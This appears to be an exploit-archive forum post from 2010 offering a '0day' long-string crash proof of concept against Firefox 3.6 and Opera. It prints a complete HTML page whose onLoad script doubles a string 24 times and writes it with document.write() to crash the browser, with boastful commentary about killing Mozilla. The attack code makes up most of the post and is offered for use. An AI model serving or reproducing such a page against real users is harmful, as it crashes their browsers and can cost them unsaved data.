Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit

pyth0n3 · March 2, 2010

===============================================================
Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit
===============================================================

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
MOzilla Crash 


#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data

open in Mozilla Firefox and wait for 15 sec ......  and say Good Bye

Mozilla .......

Per usske phele Mozilla k antim darshan kar le  Prem se bolo jai maata di

Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!

========================================================================================================================

                                                           asheesh.html
========================================================================================================================


<html>
<title>asheesh kumar mani tripathi</title>
</br>Asheesh kumar Mani Tripathi
<head>

<script>



function asheesh ()
 {
    var i=24 , anaconda = "XXXX"
    for(i=24;i >0 ;--i)
 {
        anaconda=anaconda+anaconda;
    }

    document.write(anaconda);



}

</script>
</head>

<body onLoad="asheesh()"></body>
</html>


# ~  - [ [ : Inj3ct0r : ] ]

Sign In

Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit

Recommended Posts

pyth0n3

Join the conversation

Browse

Activity

Pages